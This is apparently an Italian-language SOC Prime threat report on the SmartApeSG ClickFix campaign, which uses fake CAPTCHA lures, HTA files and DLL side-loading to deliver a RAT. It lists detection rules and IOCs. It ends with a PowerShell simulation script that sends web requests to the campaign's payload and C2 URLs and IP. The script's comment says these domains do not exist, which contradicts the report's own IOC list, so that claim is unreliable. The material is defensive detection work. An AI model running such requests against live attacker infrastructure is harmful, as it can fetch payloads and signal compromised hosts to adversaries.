SOC Prime Bias: High

05 Aug 2026 07:42 UTC

SmartApeSG Distribuisce un RAT Sconosciuto Tramite Esche di ClickFix

Author Photo
SOC Prime Team linkedin icon Segui
SmartApeSG Distribuisce un RAT Sconosciuto Tramite Esche di ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

La campagna SmartApeSG utilizza la tecnica ClickFix per ingannare gli utenti facendoli eseguire comandi dannosi tramite pagine false di CAPTCHA o di verifica umana. Questa azione avvia un file HTA che scarica ed estrae un archivio ZIP malevolo. Il carico finale è un Trojan ad Accesso Remoto (RAT) non identificato che si basa sul caricamento laterale di DLL per stabilire la persistenza e comunicare con la sua infrastruttura C2.

Indagine

L’indagine ha incluso l’analisi del traffico HTTPS, file PCAP e archivi dannosi collegati all’attività di SmartApeSG. I ricercatori hanno identificato JavaScript dannoso iniettato in siti web legittimi e tracciato la catena di infezione da un comando iniettato negli appunti alla connessione finale C2. Il RAT è stato osservato comunicare con un indirizzo IP esterno sulla porta 443 utilizzando traffico criptato.

Mitigazione

Le organizzazioni dovrebbero utilizzare il filtraggio web per bloccare i domini noti come dannosi, inclusi pewtercanto[.]top and deltaode[.]com. Gli utenti dovrebbero essere addestrati a riconoscere i metodi di ingegneria sociale come i CAPTCHA falsi e le istruzioni ClickFix. Limitare l’esecuzione dei file HTA e monitorare i processi figli sospetti lanciati dai browser o dai comandi Esegui può ulteriormente ridurre il rischio.

Risposta

Se viene rilevata un’attività di SmartApeSG, l’endpoint interessato dovrebbe essere isolato immediatamente per interrompere la comunicazione C2. Gli investigatori dovrebbero esaminare le directory AppData e Documents per identificare il RAT e i suoi meccanismi di persistenza. La telemetria dell’endpoint dovrebbe anche essere esaminata per l’esecuzione non autorizzata degli HTA, la manipolazione degli appunti e l’attività di caricamento laterale delle DLL.

Flusso di Attacco

Rilevamenti

Comando e controllo sospetto tramite richiesta DNS da dominio di primo livello (TLD) insolito (via dns)

Team SOC Prime
04 ago 2026

Variabili ambientali sospette (via cmdline)

Team SOC Prime
04 ago 2026

Esecuzione sospetta di Mshta senza file HTA (via cmdline)

Team SOC Prime
04 ago 2026

Dominio di primo livello insolito nella riga di comando (via cmdline)

Team SOC Prime
04 ago 2026

IOC (HashSha256) per rilevare: Campagna SmartApeSG ClickFix che spinge RAT non identificato

Regole AI di SOC Prime
04 ago 2026

IOC (SourceIP) per rilevare: Campagna SmartApeSG ClickFix che spinge RAT non identificato

Regole AI di SOC Prime
04 ago 2026

IOC (DestinationIP) per rilevare: Campagna SmartApeSG ClickFix che spinge RAT non identificato

Regole AI di SOC Prime
04 ago 2026

Attività RAT della campagna SmartApeSG ClickFix [Connessione di rete Windows]

Regole AI di SOC Prime
04 ago 2026

Rilevamento del RAT non identificato tramite caricamento laterale DLL da parte della campagna SmartApeSG [Evento file di Windows]

Regole AI di SOC Prime
04 ago 2026

Esecuzione della simulazione

Prerequisito: Il Telemetry & Baseline Pre-flight Check deve essere superato.

Motivo: Questo sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e puntare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrativa dell’attacco & Comandi: L’avversario sta eseguendo la campagna SmartApeSG ClickFix. Dopo che un utente è stato ingannato in un’azione dannosa (spesso un finto aggiornamento del browser), il sistema tenta di scaricare un file HTA dannoso. L’HTA in seguito avvia una connessione all’infrastruttura C2 per scaricare il carico finale del RAT. Per simulare questo, genereremo richieste di rete che colpiscano le stringhe esatte definite nella logica di rilevamento: deltaode.compo, deltaode.com/wv, e l’IP 89.124.79.98.

  • Script di test di regressione:

     # Script di simulazione per attivare la regola di rilevamento di SmartApeSG
      # Questo script simula le richieste di rete agli IoC specifici
    
      $urls = @(
          "https://deltaode.compo/payload.hta",
          "https://deltaode.com/wv/malicious.exe",
          "http://89.124.79.98:443/c2_checkin"
      )
    
      foreach ($url in $urls) {
          Write-Host "Simulazione della richiesta a: $url"
          try {
              # Utilizzando Invoke-WebRequest per generare la telemetria di rete
              # Usiamo -ErrorAction SilentlyContinue perché questi domini non esistono effettivamente
              Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue
          } catch {
              Write-Host "Richiesta fallita (prevista), ma la telemetria dovrebbe essere generata."
          }
      }
  • Comandi di pulizia:

     # Nessuna modifica permanente è stata apportata al sistema; nessuna pulizia richiesta.
      Write-Host "Simulazione completata. Nessun artefatto lasciato sul sistema."